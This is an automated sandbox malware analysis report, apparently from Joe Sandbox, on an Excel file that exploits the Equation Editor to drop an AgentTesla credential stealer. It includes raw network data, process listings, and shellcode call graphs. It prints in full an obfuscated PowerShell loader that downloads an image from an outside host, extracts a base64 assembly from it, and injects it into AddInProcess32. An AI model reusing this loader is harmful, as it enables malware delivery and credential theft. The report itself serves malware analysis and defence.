                  2024-07-02 06:22:16 UTC1369INData Raw: 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a
                  Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
                  2024-07-02 06:22:16 UTC1369INData Raw: 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49
                  Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI
                  2024-07-02 06:22:16 UTC1369INData Raw: 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92
                  Data Ascii: /mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@B
                  2024-07-02 06:22:16 UTC1369INData Raw: 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc
                  Data Ascii: t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:02:21:18
                  Start date:02/07/2024
                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                  Imagebase:0x13f8b0000
                  File size:28'253'536 bytes
                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:2
                  Start time:02:22:07
                  Start date:02/07/2024
                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Imagebase:0x400000
                  File size:543'304 bytes
                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:02:22:10
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\wscript.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\portugalslovenia.js"
                  Imagebase:0x8a0000
                  File size:141'824 bytes
                  MD5 hash:979D74799EA6C8B8167869A68DF5204A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:6
                  Start time:02:22:11
                  Start date:02/07/2024
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ".( $pSHoMe[21]+$pShome[34]+'x') ( ('t0vlink = Amahttps://uploadde'+'imagens.com.br/images/004/807/053/origin'+'al/new_image.jpg?1719846235Ama; t0vwebClient = New-Object System.Net.WebClient; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch'+' { Write-Host AmaFailed To do'+'wnload data from t0vlin'+'kAma -ForegroundColor Red'+'; exit }; if ('+'t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UT'+'F8.GetString(t0vdownloadedData); t0vstartFlag = Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END>>Ama; t0vstartIndex = t0vimageText.IndexOf(t0vstartFlag); t0vendIndex = t0vimageText.IndexOf(t0vendFlag); if (t0vstartIndex -ge 0 -and t0vendIndex -gt t0vstart'+'Index) { t0vstartIndex += t0vstartF'+'lag.Length; t0vbase64Len'+'gth = t0vendIndex - t0vstartIndex; t0vba'+'se64Command = t0vimageText.Substring(t0vstartIndex, t0vb'+'ase64Length); t0vcommandBytes = [System.Convert]::FromBase64String(t0vbase64C'+'ommand); t0vloadedAssembly = [System.Reflection.As'+'sembly]::Load(t0vcommandBytes); t0vtype = t'+'0vloadedAssembly.GetType('+'AmaRunPE.HomeAma); t0vmethod = t0vtype.GetMethod(AmaVAIAma).Invoke(t'+'0vnull, [object[]] (Amatxt.esablanoitidarTruo/651'+'.342.3.291//:ptthAma , '+'AmadesativadoAma , AmadesativadoAma'+' , Amade'+'sativadoAma,AmaAddInPro'+'cess32Ama,AmaAma)) } }Set Scriptblock t0vlink = Amahttps://uploaddeimage'+'ns.com.br/images/004/806/083/original/new_image.jpg?1719607612Am'+'a; t0vwebClient = New-O'+'bject System.Net.WebClien'+'t; try { t0vdownloadedData = t0vwebClient.DownloadData(t0vlink) } catch { Write-Host AmaFailed To download data from t0vlinkAma -ForegroundColor Red; exit }; if (t0vdownloadedData -ne t0vnull) { t0vimageText = [System.Text.Encoding]::UTF8.'+'GetString(t0vdownloadedData); t0vstartFlag '+'= Ama<<BASE64_START>>Ama; t0vendFlag = Ama<<BASE64_END'+'>>Ama; t0vstartIndex = t'+'0vi'+'mageText.IndexOf(t0vstartFlag'+'); t0vendIndex = t0vimageText.Index'+'Of(t0vendFlag); if (t0vstartIndex '+'-g'+'e 0 -and t0vendIndex -gt t0vstartIndex) { '+'t0vstartIndex += t0vstartFlag.Length; t0vbase64L'+'ength = t0vendIndex - t0vstartIndex; t0vbase64Command'+' = t0vimageText.Substring(t0vstartIndex, t0vbase64Length); t0vcommandB'+'ytes = [Sy'+'stem.Convert]:'+':FromBase64String(t0vbase64Command); t0vloadedAssembly = [System.Reflection.Assembly]::Load(t0vcommandBytes); t0vtype = t0vloadedAssembly.'+'GetType(AmaRunPE.HomeAma); t0vmethod ='+' t0vtype.GetMet'+'hod(AmaVAIAma).Invoke(t0vnull,'+' [ob'+'ject[]] (Amatxt.esabla'+'noitidarTruo/651.342.'+'3.291//:ptthAma , AmadesativadoAma , AmadesativadoAma , AmadesativadoAma,AmaAddInProcess32Ama,AmadesativadoAma)) } }').RepLAce('t0v','$').RepLAce(([ChaR]65+[ChaR]109+[ChaR]97),[STrINg][ChaR]39) )"
                  Imagebase:0x200000
                  File size:427'008 bytes
                  MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.481125469.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.481125469.0000000003AA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:02:22:14
                  Start date:02/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0x1100000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.478369752.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.478863572.0000000002545000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:true

                  Target ID:9
                  Start time:02:22:17
                  Start date:02/07/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Imagebase:0x1100000
                  File size:42'056 bytes
                  MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.618799471.0000000002545000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false

                  Reset < >

                    Execution Graph

                    Execution Coverage:18.5%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:65.1%
                    Total number of Nodes:43
                    Total number of Limit Nodes:0
                    execution_graph 272 3520539 273 352053b 272->273 276 352054e LoadLibraryW 273->276 281 3520568 276->281 282 352056b 281->282 284 3520579 282->284 285 35205cf URLDownloadToFileW 282->285 295 35205e8 285->295 288 35205ef 290 35205f7 ShellExecuteW 288->290 293 352065c 288->293 291 3520616 290->291 304 3520622 290->304 291->293 294 3520625 ExitProcess 291->294 293->284 294->293 296 35205ea 295->296 297 35205fd 3 API calls 296->297 298 35205ef 297->298 299 35205f7 ShellExecuteW 298->299 301 35205d8 298->301 300 3520622 ExitProcess 299->300 302 3520616 299->302 300->302 301->288 307 35205fd 301->307 302->301 303 3520625 ExitProcess 302->303 303->301 305 3520625 ExitProcess 304->305 306 352065d 305->306 306->291 308 3520600 ShellExecuteW 307->308 309 3520622 ExitProcess 308->309 310 3520616 309->310 311 352065d 310->311 312 3520625 ExitProcess 310->312 311->288 312->311 313 3520629 GetPEB 314 3520637 313->314 315 352048f ExitProcess 326 35204a8 315->326 327 35204ae 326->327 338 35204c4 327->338 339 35204ca 338->339 348 35204eb 339->348 349 35204ee 348->349 352 3520539 349->352 353 352053b 352->353 354 352054e 9 API calls 353->354 355 3520540 354->355

                    Callgraph

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 35205cf-35205e9 URLDownloadToFileW call 35205e8 4 35205ef-35205f5 0->4 5 35205ea call 35205fd 0->5 6 35205f7-352060f ShellExecuteW 4->6 7 352065c-3520668 4->7 5->4 9 3520616-3520619 6->9 10 3520611 call 3520622 6->10 8 352066b 7->8 12 3520673-3520677 8->12 13 352066d-3520671 8->13 9->8 14 352061b 9->14 10->9 16 3520679-352067d 12->16 17 352068c-352068e 12->17 13->12 15 352067f-3520686 13->15 14->17 18 352061d-3520627 ExitProcess 14->18 19 352068a 15->19 20 3520688 15->20 16->15 16->17 21 352069e-352069f 17->21 24 352065d-3520660 18->24 23 3520690-3520699 19->23 20->17 23->24 25 3520662-3520665 24->25 26 352069b 24->26 25->23 28 3520667 25->28 26->21 28->8
                    APIs
                    • URLDownloadToFileW.URLMON(00000000,03520579,?,00000000,00000000), ref: 035205D1
                      • Part of subcall function 035205E8: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0352060F
                      • Part of subcall function 035205E8: ExitProcess.KERNEL32(00000000), ref: 03520627
                    Memory Dump Source
                    • Source File: 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                    Similarity
                    • API ID: DownloadExecuteExitFileProcessShell
                    • String ID:
                    • API String ID: 3584569557-0
                    • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                    • Instruction ID: 4d9afaf58ae708bb4c5343e858a0c557e5a3b6f74f6d7ad7abd9687a896c8a95
                    • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                    • Instruction Fuzzy Hash: 66F027A064F3923DE711E7746C5EF6A6F29BFC3700F550889B1425F0F3D994A8048269

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 29 35205fd-3520619 ShellExecuteW call 3520622 34 352066b 29->34 35 352061b 29->35 38 3520673-3520677 34->38 39 352066d-3520671 34->39 36 352068c-352068e 35->36 37 352061d-3520627 ExitProcess 35->37 43 352069e-352069f 36->43 48 352065d-3520660 37->48 38->36 42 3520679-352067d 38->42 39->38 41 352067f-3520686 39->41 44 352068a 41->44 45 3520688 41->45 42->36 42->41 47 3520690-3520699 44->47 45->36 47->48 49 3520662-3520665 48->49 50 352069b 48->50 49->47 51 3520667 49->51 50->43 51->34
                    APIs
                    • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 0352060F
                      • Part of subcall function 03520622: ExitProcess.KERNEL32(00000000), ref: 03520627
                    Memory Dump Source
                    • Source File: 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                    • Instruction ID: 6f0105eab18171fa20e1946cec049eca8ae360cb04d63a3959d05b69ca9751a0
                    • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                    • Instruction Fuzzy Hash: 42012B9454737324DB30E6646855BB5AF15FBC3710FCC4853A8810B0F5D564B0C74ADD

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 52 35205e8-35205f5 call 35205fd 56 35205f7-352060f ShellExecuteW 52->56 57 352065c-3520668 52->57 59 3520616-3520619 56->59 60 3520611 call 3520622 56->60 58 352066b 57->58 62 3520673-3520677 58->62 63 352066d-3520671 58->63 59->58 64 352061b 59->64 60->59 66 3520679-352067d 62->66 67 352068c-352068e 62->67 63->62 65 352067f-3520686 63->65 64->67 68 352061d-3520627 ExitProcess 64->68 69 352068a 65->69 70 3520688 65->70 66->65 66->67 71 352069e-352069f 67->71 74 352065d-3520660 68->74 73 3520690-3520699 69->73 70->67 73->74 75 3520662-3520665 74->75 76 352069b 74->76 75->73 78 3520667 75->78 76->71 78->58
                    Memory Dump Source
                    • Source File: 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExecuteExitProcessShell
                    • String ID:
                    • API String ID: 1124553745-0
                    • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                    • Instruction ID: a6c39dcdef465232b0ca3a7860c85b98ee65d5df4faa15fed5f674ddf5550844
                    • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                    • Instruction Fuzzy Hash: 0F017D7064B36734E730E3646C89BA9AE96FBC3710F988457F4410B0F5C694B887869D

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 79 352054e-3520550 LoadLibraryW call 3520568 81 3520555-35205cd call 35205cf 79->81
                    APIs
                    • LoadLibraryW.KERNEL32(03520540), ref: 0352054E
                    Memory Dump Source
                    • Source File: 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 5d4f67c0b88c710392174a049d70093d2fa729af265df57f79aa0bd7959efba7
                    • Instruction ID: 1aa1f887f94080795b548791928992fcc6b2df23acf725ac6353739148e9779c
                    • Opcode Fuzzy Hash: 5d4f67c0b88c710392174a049d70093d2fa729af265df57f79aa0bd7959efba7
                    • Instruction Fuzzy Hash: CD1103A2A4E7D22FD71797309D7A611BF643B63114B4DC6CED4C20A4E3E398A141C792

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 90 3520622-3520627 ExitProcess 92 352065d-3520660 90->92 93 3520662-3520665 92->93 94 352069b 92->94 95 3520690-3520699 93->95 96 3520667-352066b 93->96 97 352069e-352069f 94->97 95->92 99 3520673-3520677 96->99 100 352066d-3520671 96->100 102 3520679-352067d 99->102 103 352068c-352068e 99->103 100->99 101 352067f-3520686 100->101 104 352068a 101->104 105 3520688 101->105 102->101 102->103 103->97 104->95 105->103
                    APIs
                    • ExitProcess.KERNEL32(00000000), ref: 03520627
                    Memory Dump Source
                    • Source File: 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                    • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                    • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                    • Instruction Fuzzy Hash:

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 106 3520629-3520634 GetPEB 107 3520637-3520648 call 3520651 106->107 110 352064a-352064e 107->110
                    Memory Dump Source
                    • Source File: 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                    • Instruction ID: 55ccb5dd4c6d350cf5ba225fd67ebff6d87758408a98059d867b18d7630e2120
                    • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                    • Instruction Fuzzy Hash: CAD05231202502CFC308DB04D980E12F77AFFC8610B28C268E0008BBA9C330E8A2CAD0

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 111 352048f-35204b6 ExitProcess call 35204a8 114 3520509-3520535 111->114 115 35204b9-35204c1 111->115 122 3520536 114->122 126 3520537-3520542 114->126 121 35204c3-35204ca 115->121 115->122 124 35204d1-35204d2 121->124 125 35204cc call 35204eb 121->125 122->126 127 3520544-3520549 124->127 128 35204d4-35204d9 124->128 125->124 126->127 130 352054c 127->130 128->127 129 35204db 128->129 129->130 131 35204dd-35204e1 129->131 131->122 132 35204e3 131->132 133 3520557-35205cd call 35205cf 132->133 134 35204e5-3520506 call 3520539 132->134 134->114
                    APIs
                    • ExitProcess.KERNEL32(0352047D), ref: 0352048F
                    Memory Dump Source
                    • Source File: 00000002.00000002.463247767.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: b13635d6134869a0656c4669781b3114731b219e39755e93e5cab16776fef191
                    • Instruction ID: de1179ccb931a774f76e97c9585293de7e696a7637b662fc6381451be02c626a
                    • Opcode Fuzzy Hash: b13635d6134869a0656c4669781b3114731b219e39755e93e5cab16776fef191
                    • Instruction Fuzzy Hash: F611A9AAA0F7E15FD326D774B99A15AFF607A53100B1C85CEC1950B0F3E25199068396

                    Execution Graph

                    Execution Coverage:9.3%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:359
                    Total number of Limit Nodes:8
                    execution_graph 14988 29cc10 14990 29cc37 14988->14990 14989 29cc81 14990->14989 14992 29f33a 14990->14992 14993 29f343 14992->14993 14995 29f377 14992->14995 14993->14990 14994 29f3af 14994->14990 14995->14994 14997 4360601 14995->14997 14998 4360535 14997->14998 14998->14997 14999 4360550 14998->14999 15026 43614b4 14998->15026 15031 43615cb 14998->15031 15036 436154d 14998->15036 15041 4360e4e 14998->15041 15046 436128e 14998->15046 15054 43618c3 14998->15054 15059 4360d82 14998->15059 15064 4361405 14998->15064 15068 4360c85 14998->15068 15073 43611c4 14998->15073 15078 4361446 14998->15078 15083 4360bda 14998->15083 15087 4361215 14998->15087 15092 4361617 14998->15092 15097 4360fa9 14998->15097 15102 4360e6a 14998->15102 15110 43614ed 14998->15110 15114 436176c 14998->15114 15122 4360d2f 14998->15122 15127 43619e4 14998->15127 15132 4361aa6 14998->15132 15139 4361339 14998->15139 15144 4360efb 14998->15144 15149 4360eba 14998->15149 15157 4360874 14998->15157 15162 4361674 14998->15162 14999->14994 15027 436086a 15026->15027 15167 299c69 15027->15167 15171 299c70 15027->15171 15028 4361a7d 15028->14998 15032 436086a 15031->15032 15034 299c69 WriteProcessMemory 15032->15034 15035 299c70 WriteProcessMemory 15032->15035 15033 4361a7d 15033->14998 15034->15033 15035->15033 15037 436086a 15036->15037 15039 299c69 WriteProcessMemory 15037->15039 15040 299c70 WriteProcessMemory 15037->15040 15038 4361a7d 15038->14998 15039->15038 15040->15038 15042 436086a 15041->15042 15044 299c69 WriteProcessMemory 15042->15044 15045 299c70 WriteProcessMemory 15042->15045 15043 4361a7d 15043->14998 15044->15043 15045->15043 15047 4361298 15046->15047 15175 4362370 15047->15175 15180 4362360 15047->15180 15048 436086a 15052 299c69 WriteProcessMemory 15048->15052 15053 299c70 WriteProcessMemory 15048->15053 15049 4361a7d 15049->14998 15052->15049 15053->15049 15055 436086a 15054->15055 15057 299c69 WriteProcessMemory 15055->15057 15058 299c70 WriteProcessMemory 15055->15058 15056 4361a7d 15056->14998 15057->15056 15058->15056 15060 436086a 15059->15060 15062 299c69 WriteProcessMemory 15060->15062 15063 299c70 WriteProcessMemory 15060->15063 15061 4361a7d 15061->14998 15062->15061 15063->15061 15193 4362328 15064->15193 15198 4362318 15064->15198 15065 436141d 15069 436086a 15068->15069 15069->15068 15071 299c69 WriteProcessMemory 15069->15071 15072 299c70 WriteProcessMemory 15069->15072 15070 4361a7d 15070->14998 15071->15070 15072->15070 15074 436086a 15073->15074 15076 299c69 WriteProcessMemory 15074->15076 15077 299c70 WriteProcessMemory 15074->15077 15075 4361a7d 15075->14998 15076->15075 15077->15075 15079 436086a 15078->15079 15079->15078 15081 299c69 WriteProcessMemory 15079->15081 15082 299c70 WriteProcessMemory 15079->15082 15080 4361a7d 15080->14998 15081->15080 15082->15080 15085 299c69 WriteProcessMemory 15083->15085 15086 299c70 WriteProcessMemory 15083->15086 15084 4360c0e 15085->15084 15086->15084 15088 436086a 15087->15088 15090 299c69 WriteProcessMemory 15088->15090 15091 299c70 WriteProcessMemory 15088->15091 15089 4361a7d 15089->14998 15090->15089 15091->15089 15093 436086a 15092->15093 15095 299c69 WriteProcessMemory 15093->15095 15096 299c70 WriteProcessMemory 15093->15096 15094 4361a7d 15094->14998 15095->15094 15096->15094 15098 436086a 15097->15098 15100 299c69 WriteProcessMemory 15098->15100 15101 299c70 WriteProcessMemory 15098->15101 15099 4361a7d 15099->14998 15100->15099 15101->15099 15103 4360e74 15102->15103 15106 4362370 2 API calls 15103->15106 15107 4362360 2 API calls 15103->15107 15104 436086a 15108 299c69 WriteProcessMemory 15104->15108 15109 299c70 WriteProcessMemory 15104->15109 15105 4361a7d 15105->14998 15106->15104 15107->15104 15108->15105 15109->15105 15112 299c69 WriteProcessMemory 15110->15112 15113 299c70 WriteProcessMemory 15110->15113 15111 4361517 15112->15111 15113->15111 15115 43612b4 15114->15115 15116 436086a 15114->15116 15120 4362370 2 API calls 15115->15120 15121 4362360 2 API calls 15115->15121 15118 299c69 WriteProcessMemory 15116->15118 15119 299c70 WriteProcessMemory 15116->15119 15117 4361a7d 15117->14998 15118->15117 15119->15117 15120->15116 15121->15116 15123 4361a56 15122->15123 15125 299c69 WriteProcessMemory 15123->15125 15126 299c70 WriteProcessMemory 15123->15126 15124 4361a7d 15124->14998 15125->15124 15126->15124 15128 436086a 15127->15128 15130 299c69 WriteProcessMemory 15128->15130 